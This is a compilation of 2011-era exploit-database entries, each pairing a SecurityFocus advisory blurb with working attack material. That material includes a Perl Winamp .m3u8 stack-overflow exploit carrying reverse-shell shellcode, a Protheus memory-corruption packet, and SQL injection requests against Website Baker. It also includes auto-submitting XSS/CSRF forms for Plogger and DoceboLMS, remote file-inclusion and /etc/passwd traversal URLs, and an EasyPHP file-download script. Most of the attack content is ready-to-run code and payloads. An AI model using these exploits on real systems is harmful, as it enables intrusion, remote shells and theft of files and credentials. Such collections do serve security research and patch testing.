Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php
06.04.2011
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
source: https://www.securityfocus.com/bid/47342/info
TOTVS ERP Microsiga Protheus is prone to a denial-of-service vulnerability due to a memory-corruption issue.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed.
--- CODE SNIPPET BEGIN ---
if options.target == 8:
version = "20081215030344"
else:
version = "20100812040605"
packet_handshake = (
"%14s"
"\x00\x01"
"%36s\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"%32s\x00"
"%s\x00"
"\x00\x00\x14\x01"
) % ("A"*14, "B"*36, "C"*32, version)
packet_environ = (
"\x42\x00\x00\x00\x21\xab\x42\x00\x00\x00"
"\xff\xff\xff\xff" # Memory Corruption (-1 as size)
# "\x38\x00\x00\x00" # OK (56 bytes)
"\x01\x00\x3e\x82\x01\x03\x02\x04\x00\x00"
"\x00\x00%7s\x00\x00\x00\x00\x00\x00"
"%11s\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
) % ("D"*7, "E"*11)
--- CODE SNIPPET END ---
source: https://www.securityfocus.com/bid/47333/info
Winamp is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Winamp 5.6.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Stack Overflow
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###
my $header = "#EXTM3U\n";
my $junk = "\x41" x 16240; # Buffer Junk
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll
my $seh = pack('V',0x10017928); # add ESP,4404
$seh = $seh.pack('V',0x00000003); # Value de : EAX
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x41414141); # Value de : ECX
$seh = $seh."\x41" x 3;
$seh = $seh.pack('V',0x007EA478); # Value de : EDX
$seh = $seh."\x41" x 22;
$seh = $seh.pack('V',0x40000001); # Value de : EBX
$seh = $seh."\x41" x 8;
$seh = $seh.pack('V',0x028F1DB0); # Valeu de : ESP
$seh = $seh."\x41" x 12;
$seh = $seh.pack('V',0x77230459); # Valeu de : EBP
$seh = $seh."\x41" x 10;
$seh = $seh.pack('V',0x08FD62A8); # Valeu de : ESI
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x00497300); # Valeu de : EDI
$seh = $seh."\x41" x 2;
$seh = $seh.pack('V',0x08FD293C); # Valeu de : EIP
$seh = $seh."\x41" x 5;
my $nops = "\x90" x 100; # Nop
my $space = "\x41" x (43492 - length($junk) - length($nops));
my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com)
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41";
my $end = "\x90" x (20000 - $nops); # Nop sled
open(FILE,'>>KedAns.m3u8');
print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
close(FILE);
source: https://www.securityfocus.com/bid/47332/info
Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Website Baker 2.8.1 is vulnerable; other versions may also be affected.
POST /admin/users/add.php HTTP/1.1
user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add
POST /admin/groups/add.php HTTP/1.1
advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add
source: https://www.securityfocus.com/bid/47329/info
Plogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.
<form action="http://host/plog-admin/plog-options.php" method="post">
<input type="hidden" name="gallery_name" value='my gallery"><script>alert(document.cookie)</script>'>
<input type="hidden" name="gallery_url" value="http://host/">
<input type="hidden" name="admin_username" value="Ildar">
<input type="hidden" name="admin_email" value="valeevildar@ya.ru">
<input type="hidden" name="admin_password" value="">
<input type="hidden" name="confirm_admin_password" value="">
<input type="submit" id="btn" name="submit" value="Update Options">
</form>
<script>
document.getElementById('btn').click();
</script>
source: https://www.securityfocus.com/bid/47320/info
The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.
Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable.
http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1
source: https://www.securityfocus.com/bid/47317/info
The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
Spellchecker 3.1 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/general.php?file=http://sitename.com/Evil.txt?
http://www.example.com/general.php?file=../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/47310/info
MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'.
An attacker may exploit this issue to execute arbitrary code with superuser privileges. Failed attempts will cause the affected application to crash, denying service to legitimate users. A successful exploit will completely compromise affected computers.
MIT Kerberos 5 1.7 and later are vulnerable.
NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue.
# nmap -n -sV krb01
source: https://www.securityfocus.com/bid/47145/info
EasyPHP is prone to a vulnerability that lets attackers to download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
EasyPHP 5.3.5.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# ********* In The name of Allah ************
###
# Title : EasyPHP Web Server 5.3.5.0 Remote File Download Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Content/Download File
# Tested on : Windows XP SP3 Fran�ais
# Target : EasyPHP 5.3.5.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# EasyPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
# ------------
# ********* In The name of Allah ************
system("title KedAns-Dz");
system("color 1e");
system("cls");
sleep(1);
# Start Exploit : ** Allah Akbar **
use LWP::Simple;
if (@ARGV < 3) {
print("\r\n");
print("=================================================================\r\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n");
print(" [!] Usage: " .$0. " <host> <port> <file>\r\n");
print(" [!] HOST - An host using EasyPHP Web Server\r\n");
print(" [!] PORT - Port number\r\n");
print(" [!] FILE - The file you want to get\r\n");
print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n");
print("=================================================================\r\n\r\n");
sleep(1);
exit(1);
# ** Allah Akbar **
} else {
print("=================================================================\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n\r\n");
sleep(2);
($host, $port, $file) = @ARGV;
$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
print(" [+] File Content:\r\n\r\n");
sleep(2);
print($content. "\r\n");
open (KDZ ,">","KedAns.log");
print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n" .
"Greets All Hackers Moslems & All My Friends \r\n" .
"Target : http://$host:$port/$file \r\n" .
"File Content : \n\n" .
"=============================\r\n\n" .
"$content";
print("\r\n");
print("=================================================================\n");
print "\n[+++] Creating And Download the Target File Content in KedAns.log \n";
}
# ** In The Peace of Allah **
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
source: https://www.securityfocus.com/bid/47150/info
DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
DoceboLMS 4.0.4 is vulnerable; other versions may also be affected.
<html>
<title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="code" value='"><script>alert(1)</script>' />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="id_assess" value="0" />
<input type="hidden" name="name" value='"><script>alert(2)</script>' />
<input type="hidden" name="save" value="Save changes" /></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="language" value="2" />
<input type="hidden" name="long_desc" value="" />
<input type="hidden" name="news" value="Insert" />
<input type="hidden" name="short_desc" value="ZSL" />
<input type="hidden" name="title" value='"><script>alert(1)</script>' /></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br />
</body></html>
source: https://www.securityfocus.com/bid/47157/info
Anantasoft Gazelle CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Anantasoft Gazelle CMS 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?lookup=<script>alert(888)</script>
http://www.example.com//register.php?^name=&pass=&controle=&email=&showemail=&save=Save&table=users&active=0&activate=3fb04953d95a94367bb133f862402bce&location=%2FAnanta_Gazelle1.0%2Fregister.php&joindate=2011-04-05+07%3A58%3A50 [is vulnerable to ' input SQL inject]
source: https://www.securityfocus.com/bid/47142/info
The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Placester 0.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
source: https://www.securityfocus.com/bid/47133/info
GameHouse 'InstallerDlg.dll' ActiveX control is prone to multiple vulnerabilities.
Successfully exploiting these issues allows the attacker to execute arbitrary commands within the context of the application (typically, Internet Explorer) that uses the ActiveX control, and allows remote attackers to create or overwrite arbitrary local files and to execute arbitrary code. Failed exploit attempts will result in a denial-of-service condition.
InstallerDlg.dll 2.6.0.445 is vulnerable; other versions may also be affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-2.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-3.rb
source: https://www.securityfocus.com/bid/47131/info
MyBB is prone to multiple security vulnerabilities. These vulnerabilities include a username-enumeration weakness, an XML-injection vulnerability, and a cross-site scripting vulnerability.
Exploiting these issues may allow attackers to discern valid usernames, which may aid them in brute-force password cracking or other attacks. Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
Versions prior to 1.6.2 and 1.4.15 are vulnerable.
XML-injection:
http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cxml/%3E
XSS:
http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E